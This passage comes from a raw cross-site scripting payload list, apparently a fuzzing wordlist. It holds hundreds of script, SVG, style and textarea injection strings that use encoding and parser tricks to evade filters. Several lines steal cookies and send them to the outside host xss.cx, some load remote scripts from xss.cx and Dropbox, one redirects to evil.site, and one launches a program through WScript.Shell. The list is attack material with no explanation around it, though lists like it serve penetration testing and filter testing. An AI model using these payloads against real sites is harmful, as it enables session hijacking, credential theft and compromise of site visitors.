%00>confirm&lpar;1&rpar;\n<<scr\\0ipt/src=http://xss.cx/xss.js></script\n<scri%00ipt>confirm(0);</script>\n\"<scri%00pt>confirm(0);</scri%00pt>\"\n\"\\\"><scri%00pt>confirm(0);</scri%00pt>\",\n<scri%00pt>confirm(0);</scri%00pt>\n><scri%00pt>confirm(0);</scri%00pt>\n<scri%00pt>confirm(1);</scri%00pt>\n</script>\n<script>\n<script>/*     */confirm(1)/*     */</script>\n<script>     function b() { return Safe.get(); } confirm(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> \n<script>  function foo(elem, doc, text) {   elem.onclick = function (e) {    e.__defineGetter__(text[0], function () { return true })    confirm(Safe.get());   };      var event = doc.createEvent(text[1]);   event.initEvent(text[2], true, true);   elem.dispatchEvent(event);  } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # \n<script>  (function (o) {   function exploit(x) {    if (x !== null)     confirm('User cookie is ' %2B x);    else     console.log('fail');   }      o.onclick = function (e) {    e.__defineGetter__('isTrusted', function () { return true; });    exploit(Safe.get());   };      var e = document.createEvent('MouseEvent');   e.initEvent('click', true, true);   o.dispatchEvent(e);  })(document.getElementById('safe123')); </script>\n<script /*%00*/>/*%00*/confirm(1)/*%00*/</script /*%00*/\n'\"`><script>/* **chr*log(*num*)// */</script>\n<script>/* **chr*/log(*num*)// */</script>\n<script ~~~>confirm(0%0)</script ~~~>\n<script ^__^>confirm(String.fromCharCode(49))</script ^__^\n<script /***/>/***/confirm('\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450')/***/</script /***/\n<script> document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>\n<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>\n<script for=_ event=onerror()>confirm(/@ma1/)</script><img id=_ src=>\n<script for=document event=onreadystatechange>getElementById('safe123').click()</script>\n<script id=x>x.removeAttributeNode(document.createAttribute(status))</script>\n<script itworksinallbrowsers>/*<script* */confirm(1)</script\n<script itworksinallbrowsers>/*<script* */confirm(1)</script ?\n<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>\n<script> logChr0x09(1); </script>\n<script src=\"#\">{alert(1)}</script>;1\n<script src=>confirm(8)</script>\n\"/><script src=\"data:text/javascript,confirm(1)\"></script>\n<script src=\"data:text/javascript,confirm(1)\"></script>\n\"<script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script>\"\n\"\\\"><script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script>\",\n<script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script>\n><script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script>\n<script src=\"/\\example.com\\foo.js\"></script> // Safari 5.0, Chrome 9, 10<script src=\"\\\\example.com\\foo.js\"></script> // Safari 5.0\n<script src=\"//⒕₨\"></script>)\n<script type=\"text/xaml\"><Canvas Loaded=\"confirm\" /></script>\n<script> \"\\ud83d\\u*hex4*\".match(/.*<.*/) ? log(*num*) : null; </script>\n<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22);  xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{   var c;   if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) )    confirm(c[1]); }catch(e){} };  xdr.send(); </script>\n<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click';  document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>\n\"/><script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); confirm(RegExp.%241); } } xmlHttp.send(null); }; </script>#\n<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); confirm(RegExp.%241); } } xmlHttp.send(null); }; </script>\n<script> var+x+=+showModelessDialog+(this); confirm(x.document.cookie); </script>\n\"/><script x> confirm(1) </script 1=2\n<script x> confirm(1) </script 1=2\n\"><script x=#\"async=#\"src=\"//⒛₨\n<script xmlns=\"http://www.w3.org/1999/xhtml\">&#x61;l&#x65;rt&#40;1)</script>\n<script/%00%00v%00%00>confirm(/@jackmasa/)</script> and %c0″//(%000000%0dconfirm(1)//\n<script>({0:#0=alert/#0#/#0#(0)})</script>\n<script>({0:#0=confirm/#0#/#0#(0)})</script>\n</script%0A-_-><script>confirm(1)</script%0A-_->\n</script%0a><script%0a>confirm(1)</script%0a>\n<script>(0)['constructor']['constructor'](\"\\141\\154\\145\\162\\164(1)\")();</script>\n\"<script>1-confirm(0);</script>\"/>\n\"/><script>+-+-1-+-+confirm(1)</script>\n<script>+-+-1-+-+confirm(1)</script>\n<script>1\\u0069\\u006E[];</script>\n</script%20><script%20>confirm(1)</script%20>\n<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});confirm(Safe.get())</script>\n<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});confirm(Safe.get())</script>\n<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>\n<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>\n<script>Reflect.construct(function(){new.target.constructor('alert(1)')()},[])</script>\n<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>\n<script>a = {get[alert`1`](){}}</script>\n<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>\n<script>a='abc\\*chr*\\';log(*num*)//def';</script>\n<script>alert//.%0D(1)</script>\n<script<{alert(1)}/></script </>\n¼script¾alert(¢xss¢)¼/script¾\n<script>a=\"<!--\";//</script>alert(1)--></script>\n<script>a=\"<%\"//</script>alert(1)//%></script>\n<script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>\n\"'`><script>a=/xss;*chr*;i=0;log(*num*);a/i;</script>\n\"`'><script>*chr*log(*num*)</script>\n<script>class a{@alert get}</script>\n\"<script>'confirm(0)%3B<%2Fscript>\"\n\"\\\"><script>'confirm(0)%3B<%2Fscript>\",\n<script>'confirm(0)%3B<%2Fscript>\n><script>'confirm(0)%3B<%2Fscript>\n\"<script>confirm(0);</script>\"\n\"><\"script\">\"confirm(0)\"</\"script\">\n\"\\\"><script>confirm(0)</script>\",\n<script>confirm(0);</script>\n><script>confirm(0)</script>\n\"'><script>confirm(1)</script>\",\n<sc'+'ript>confirm(1)</script>\n<script>confirm(1)</script>\n>\"<>\"<script>confirm(1)</script>\n[<script>]=*confirm(1)</script>\n∀㸀㰀script㸀confirm(1)㰀/script㸀\n<%<!--'%><script>confirm(1);</script -->\n<%<!--'%><script>confirm(1);</script -->\n\"/><script>confirm(1);</script><img src=x onerror=x.onerror=prompt(0)>\n\"\\\"/><script>confirm(1);</script><img src=x onerror=x.onerror=prompt(0)>\"\n>\"<>\"<script>confirm(2)</script>\n<script>confirm(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>\n\"<script>confirm(String.fromCharCode(88,83,83));</script>\"\n\"\\\"><script>confirm(String.fromCharCode(88,83,83));</script>\",\n<script>confirm(String.fromCharCode(88,83,83));</script>\n><script>confirm(String.fromCharCode(88,83,83));</script>\n<script>/*confirm(\"Woops\");*/</script>\n<script>confirm(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>\n<script>confirm(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>\n<script>confirm(document.head.childNodes[3].text)</script>\n<script>confirm(document.head.innerHTML.substr(146,20));</script>\n>\"><script>confirm(document.location)</script>&\n<script>confirm(\"&quot;no\")</script>\n<script>confirm(x.y[0])</script>\n<script>confirm(x.y.x.y.x.y[0]);confirm(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>\n<script>``.constructor.constructor`confirm\\`1\\````</script>\n<script>``.constructor.constructor`confirm\\`1\\````</script>\n<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>\n<script>document.body.innerHTML=\"<h1>XSS-Here</h1>\"</script>\n<script>document.write(Array(184).join('<marquee>'))</script>\n\"/><script>document.write(\"<img src=//xss.cx/\" + document.cookie + \">\")</script>\n<script>document.write(\"<img src=//xss.cx/\" + document.cookie + \">\")</script>\n<script>eval.call`${'prompt\\x281)'}`</script>\n<script>function makePopups(){\tfor (i=1;i<6;i++) {\t\twindow.open('popup.html','spam'+i,'width=50,height=50');\t}}</script><body><a href=\"#\" onclick=\"makePopups()\">Spam</a>\n<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });confirm(Safe.get.apply(null, arguments));})();</script>\n<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\n<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\n<script>[{get[alert(1)]()false}]</script>\n<script>history.pushState(0,0,'/i/am/somewhere_else');</script>\n<script>if(\"x\\*chr*\".length==1) { log(*num*);}</script>\n</script><img/*%00/src=\"worksinchrome&colon;prompt&#x28;1&#x29;\"/%00*/onerror='eval(src)'>\n\"`'><script>lo*chr*g(*num*)</script>\n\"`'><script>lo*chr*g(*num*)</script>\n\"'`><script>log*chr*(*num*)</script>\n<script/onload=confirm(1)></script>\n<script>parent.location.replace('javascript:alert(document.domain)')</script>\n\"><script>`#${prompt(1)}#`</script>\n\\\"><script>prompt(1)</script>\n<script>prompt.call`${1}`</script>\n</script><script>alert(1)+\"\n</script><script>confirm(3)</script>\n</script><script>/*var a=\"/*\"\"'/**/;confirm(1);//</script>\n<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>\n<script>({set/**/$($){_/**/setter=$,_=1}}).$=confirm</script>\n<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>\n\"><script/src=data:,alert(1)-\">\n\"><script/src=data:,alert(1)%26sol;%26sol;\n\"><script/src=data:,alert(1)%2b\"\n\"/><script/src=\"data&colon;text%2Fj\\u0061v\\u0061script,\\u0061lert('\\u0061')\"></script a=\\u0061 & /=%2F\n<script/src=\"data&colon;text%2Fj\\u0061v\\u0061script,\\u0061lert('\\u0061')\"></script a=\\u0061 & /=%2F\n<script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/XSS/)></script\n<script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/XSS/)></script ????????????\n\"/><script+src=data:,confirm(1)<!-- \n<script+src=data:,confirm(1)<!-- \n<script/src=//xss.cx>/*\n<script>str='';for(i=0;i<0xefff;i++){str+='<script>AAAAAA';};document.write('<svg>'+str+'</svg>');</script>\n</script><svg '//\"\n</script><svg onload='-/\"/-confirm(1)//'\n</script><svg onload='-/\"/-confirm(1)//'\"\n\"</script><svg><script>alert(1)+&quot;\";\n<script>try { document.write(document.location); } catch(e) { document.write(e.message); }</script>\n<script>try{eval(\"<></>\");logBoolean(1)}catch(e){logBoolean(0)};</script>\n<script>~'\\u0061' ;  \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073.  \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+\n<script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+\n<script>-{valueOf:location,toString:[].pop,0:'vbscript:confirm%281%29',length:1}</script> \n<script>var location={};</script>\n<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){confirm(request.responseText.substr(150,41));}</script>\n<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); confirm(ta.value.match(/cookie = '(.*?)'/)[1])</script>\n<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>\n<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _confirm = confirm;confirm = function() { confirm = _confirm };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });confirm(get());})();};safe123.click();</script>#\n<script>var%20x%20=%20“a”;%20confirm(1);//”;</script>\n<script/v>confirm(/@jackmasa/)</script>\n`'\"><script>window['log*chr*'](*num*)</script>\n'<script>window.onload=function(){document.forms[0].message.value='1';}</script>\n<script>write(“<img/src=//xss.cx/?”+cookie.replace(/\\s/g,\"\")+“>”)></script>\n<script>x=\"confirm(1)\".replace(/.+/,eval)//\"</script>\n<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});confirm(parent.Safe.get())<\\/script>%22)};document.body.appendChild(x);</script>\n<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\\/script>%22)};document.body.appendChild(x);</script>\n<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>\n<script>x=new ActiveXObject(\"WScript.Shell\");x.run('calc');</script>\n<script>x=\"\"!=prompt(9)!=\"\";y=42;</script>\n<script>x=\"\"%prompt(9)%\"\";y=42;</script>\n<script>x=\"\"&&prompt(9)&&\"\";y=42;</script>\n<script>x=\"\"&prompt(9)&\"\";y=42;</script>\n<script>x=\"\"*prompt(9)*\"\";y=42;</script>\n<script>x=\"\"+prompt(9)+\"\";y=42;</script>\n<script>x=\"\"-prompt(9)-\"\";y=42;</script>\n<script>x=\"\"/prompt(9)/\"\";y=42;</script>\n<script>x=\"\"<<prompt(9)<<\"\";y=42;</script>\n<script>x=\"\"<=prompt(9)<=\"\";y=42;</script>\n<script>x=\"\"<prompt(9)<\"\";y=42;</script>\n<script>x=\"\"===prompt(9)===\"\";y=42;</script>\n<script>x=\"\"==prompt(9)==\"\";y=42;</script>\n<script>x=\"\">=prompt(9)>=\"\";y=42;</script>\n<script>x=\"\">>>prompt(9)>>>\"\";y=42;</script>\n<script>x=\"\">>prompt(9)>>\"\";y=42;</script>\n<script>x=\"\">prompt(9)>\"\";y=42;</script>\n<script>x=\"\"?prompt(9):\"\";y=42;</script>\n<script>x=\"\"^prompt(9)^\"\";y=42;</script>\n<script>x=\"\"|prompt(9)|\"\";y=42;</script>\n<script>x=\"\"||prompt(9)||\"\";y=42;</script>\n</script/x><svg onload=alert(domain)>\n\"><scri<script></script>pt>confirm(document.cookie);</scri<script></script>pt>\n<scri\\x00pt>confirm(1);</scri%00pt>\nsetTimeout(['confirm(4)']);\n<source srcset=\"x\"><img onerror=\"confirm(5)\"></picture>\n<span class=foo>Some text</span><a class=bar href=\"http://www.example.org\">www.example.org</a><script src=\"http://code.jquery.com/jquery-1.4.4.js\"></script><script>$(\"span.foo\").click(function() {alert('foo');$(\"a.bar\").click();});$(\"a.bar\").click(function() {alert('bar');location=\"http://html5sec.org\";});</script>\n<span id=\"x\" data-constructor=oops></span><script>confirm(x.dataset.constructor)</script>\nstop, open, print && confirm(1)\n</style &#32;><script &#32; :-(>/**/confirm(document.location)/**/</script &#32; :-(\n<style onload='execScript(/**/\"\\x61lert&#40 1&#41\",\"j\\x61vascript\");'>\n<style onreadystatechange=\"alert(1)\">\n<style>body{font-size: 0;} h1{font-size: 12px !important;}</style><h1><?php echo \"<hr />THIS IMAGE COULD ERASE YOUR WWW ACCOUNT, it shows you the PHP info instead...<hr />\"; phpinfo(); __halt_compiler(); ?></h1>\n<style>*{font-family:'Serif}';x[value=expression(confirm(URL=1));]{color:red}</style>\n<style><img src=\"</style><img src=x onerror=alert(1)//\">\n<style>@import \"data:,*%7bx:expression(write(1))%7D\";</style>\n<style>*[{}@import'test.css?]{color: green;}</style>X\n<style/>&lt;/style&gt;&lt;img src=1 onerror=confirm(1)&gt;</style>\n<style>*{-o-link:'data:text/html,<svg/onload=confirm(5)>';-o-link-source:current}</style><a href=1>aaa\n<style/onload    =    !-confirm&#x28;1&#x29;>\n<style/onload=confirm(1)>\n<style/onload=\"javascript:if('[object Object]'=={}&&1==[1])confirm(1);\">\n<style/onload=&lt;!--&#09;&gt;&#10;confirm&#10;&lpar;1&rpar;>\n<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;\n<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>\n<style>p[foo=bar{}*{-o-link:'javascript:confirm(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>\n'\"--></style></script><script>alert(0x0009BE)</script>\n<///style///><span %2F onmousemove='confirm&lpar;1&rpar;'>SPAN\n<style>//<!--</style> -->*{x:expression(confirm(4))}//<style></style>\n<style>*{x:ï½ï½ï½ï½ï½ï½ï½ï½ï½ï½(write(1))}</style>\n<svg contentScriptType=text/vbs><script>MsgBox+1\n<svg contentScriptType=text/vbs><script>XSS\n<svg id=1 onload=confirm(1)> \n<svg </onload =\"1> (_=alert,_(1)) \"\">\n<svg onload=0?1:alert(9)>\n<svg onload=1?alert(9):0>\n>\"><svg onload=alert(0)>\n<svg onload=\f+~-!\u000balert(1)>\n<svg onload=confirm(1)\n\"><svg onload=\"confirm(7)\">\n<svg onload=\"confirm(7)\">\n<svg onload=eval(URL)>\n<svg onload=eval(document.cookie)>\n<svg onload=eval(window.name)>\n<svg onload=\"javascript:alert(1)\" xmlns=\"http://www.w3.org/2000/svg\"></svg>\n<svg onresize=\"alert(1)\">\n<svg xml:base=\"data:text/html,<script>confirm(1)</script>\"><a xlink:href=\"#\"><circle r=\"40\"></circle></a></svg>\n<svg xmlns=\"http://www.w3.org/2000/svg\" id=\"foo\"><x xmlns=\"http://www.w3.org/2001/xml-events\" event=\"load\" observer=\"foo\" handler=\"data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar\"/></svg>\n<svg xmlns=\"http://www.w3.org/2000/svg\" id=\"x\"><listener event=\"load\" handler=\"#y\" xmlns=\"http://www.w3.org/2001/xml-events\" observer=\"x\"/><handler id=\"y\">alert(1)</handler></svg>\n<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\"><animation xlink:href=\"javascript:alert(1)\"/><animation xlink:href=\"data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E\"/><image xlink:href=\"data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E\"/><foreignObject xlink:href=\"javascript:alert(1)\"/><foreignObject xlink:href=\"data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E\"/></svg>\n<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\"><feImage><set attributeName=\"xlink:href\" to=\"data:image/svg+xml;charset=utf-8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D\"/></feImage></svg>\n<svg xmlns=\"http://www.w3.org/2000/svg\"><a id=\"x\"><rect fill=\"white\" width=\"1000\" height=\"1000\"/></a><rect  fill=\"white\" style=\"clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);\"/></svg>\n<svg xmlns=\"http://www.w3.org/2000/svg\"><a xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:href=\"javascript:alert(1)\"><rect width=\"1000\" height=\"1000\" fill=\"white\"/></a></svg>\n<svg xmlns=\"http://www.w3.org/2000/svg\"><g onload=\"javascript:alert(1)\"></g></svg>\n<svg xmlns=\"http://www.w3.org/2000/svg\"><g onload=\"javascript:confirm(1)\"></g></svg>\n<svg xmlns=\"http://www.w3.org/2000/svg\"><handler xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\">alert(1)</handler></svg>\n<svg xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M0,0\" style=\"marker-start:url(test4.svg#a)\"/></svg>\n<svg xmlns=\"http://www.w3.org/2000/svg\"><script>alert(1)</script></svg>\n<svg xmlns=\"http://www.w3.org/2000/svg\"><set attributeName=\"onmouseover\" to=\"alert(1)\"/><animate attributeName=\"onunload\" to=\"alert(1)\"/></svg>\n<svg xmlns:xlink=\"http://www.w3.org/1999/xlink\"><a><circle r=100 /><animate attributeName=\"xlink:href\" values=\";javascript:confirm(1)\" begin=\"0s\" dur=\"0.1s\" fill=\"freeze\"/>\n<svg></ y=\"><x\" onload=confirm(4)>\n<svg[U+000B]onload=alert(1)>\n<svg><a xyz:href=123><text>test</text></svg> \n\"><svg/a=#\"onload='/*#*/prompt(1)'\n<svg><doh onload=confirm(1)>\n<svg><image style='filter:url(\"data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>\")'><!--Same effect with<image filter='...'>--></svg>\n<svg><image x:href=\"data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='confirm(1)'%3E%3C/svg%3E\">\n\"><svg/onload\"\n<svg+onload=+\"[DATA]\"\n<svg+onload=+\"aler%25%37%34(1)\"\n<svg/onload=alert&#40&#41>\n\"<svg/onload=confirm(0);prompt(0);>\"\n<svg/onload=confirm(0);prompt(0);>\n<svg/onload=confirm(1)\n\"/><svg/onload=confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83));prompt(0)>\n\"\\\"/><svg/onload=confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83));prompt(0)>\"\n<svg/onload='javascript0x00:void(0)%00?void(0)&colon;confirm(1)'>\n\"<svg/onload=prompt(0);>\"\n<svg/onload=prompt(0);>\n\"><svg/onload=prompt(1)>\n--!><svg/onload=prompt(1)\n<svg/onload=prompt(1)\n<svg/onload=prompt&#40;1)\n\"<svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>\"\n\"\\\"><svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>\",\n<svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>\n><svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>\n<svg/onload=setTimeout`alert\\`1\\``>\n<svg/onload=setTimeout`alert\\`1\\``>\n<svg/onload=window.onerror=alert;throw/XSS/;//\n<svg/onload=window.onerror=confirm;throw/5/;//\n<svg/onload=window.onerror=confirm;throw/XSS/;//\n<svg/onload=window.onerror=confirm;throw/XSS/;//\"\n<svg><script /* /*/*/*>\\u0061l\\u0065rt`X`\n<svg><script ?>confirm(1)\n<svg><script ?>confirm(1);\n<svg><script onlypossibleinopera:-)> confirm(1)\n<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js'\n<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script\n<svg><script xlink:href=\"url(#)\"></script></svg>\n<svg><script xss>\\u0061l\\u0065rt`X`</script>\n<svg><script><![CDATA[\\]]><![CDATA[u0061]]><![CDATA[lert]]>(1)</script>\n\"/><svg><script>//&NewLine;confirm(1);</script </svg>\n<svg><script>//&NewLine;confirm(1);</script </svg>\n<svg><script>alert(1)<br>\n<svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>\n<svg><script>a<!>le<!---->rt<?>(1</>)</script>\n<svg><script>alert&#40 1&#41<b>\n<svg><script>a<svg//onload=confirm(2) />lert(1)</script>\n<svg><script>confirm&#40/1/&#41</script>\n<svg><script>confirm&DiacriticalGrave;1&DiacriticalGrave;<p><svg><script>confirm&grave;1&grave;<p>\n<svg><script>confirm(\"&quot;);confirm('yes')//no\")</script>\n<svg><script/href=\"xss.cx/xss.js\"//>\n<svg><script>location&equals;&#60&#62javascript&amp;#x3A;confirm(1)&#60&#33&#47&#62;</script>\n<svg><script>/*&midast;&sol;confirm(3)&sol;&sol;*/</script></svg>\n<svg><script>prompt&#40;1)<b>\n<svg><script>prompt&#40;1)<b>\n<svg><script>prompt&#40;1)</script>\n<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'\n<svg><style>*{font-family:'<svg onload=confirm(1)>';}</style></svg>\n<svg><style>&ltimg src=x onerror=confirm(1)&gt</svg>\n<svg><style>&lt;img/src=x onerror=alert(1)// </b>\n</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>confirm&#x28;1&#x29;\n<table background=\"javascript:alert(1)\"></table>\n?t=confirm(1)&k7=\"><svg/t='&k8='onload='/&k9=/+eval(t)'\n[test](javascript://%0d%0aprompt(1))\n[test](javascript://%0d%0aprompt(1);com)\ntest=scriptx=document.createElement(%27script%27);x.innerHTML=%27confirm(location)%27;document.body.appendChild(x);/script&notbot=UzXGjMCo8AoAAFUcKTEAAAAN\n<textarea autofocus onfocus=confirm(3)>\n<textarea id=ta onfocus=%22write('<script>confirm(1)</script>')%22 autofocus></textarea>\n<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520confirm(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\\/script%26gt;\\%26quot;%26quot;) autofocus></textarea>\n\"/><textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));confirm(ta.value.match(/cookie = '(.*?)'/)[1])</script>\n<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));confirm(ta.value.match(/cookie = '(.*?)'/)[1])</script>\n<textarea name='file\"; filename=\"test.<img src=a onerror=document&amp;#46;location&amp;#61;&amp;#34;http:&amp;#47;&amp;#47;evil&amp;#46;site&amp;#34;>'>\n\"<textarea onmousemove='confirm(1);'>\"\n/textarea><script>alert(1)</script>\n<textarea></textarea>test<!-- </textarea><img src=xx: onerror=confirm(1)> --> \n<\"\"/title>\n</title\"\">\n</title id=\"\">\n<title onpropertychange=alert(1)></title><title title=></title>\n</title><frameset><frame src=\"data:text/html, fill the whole page and overlap everything<script>confirm(1)</script>\">\n</title><frameset><frame 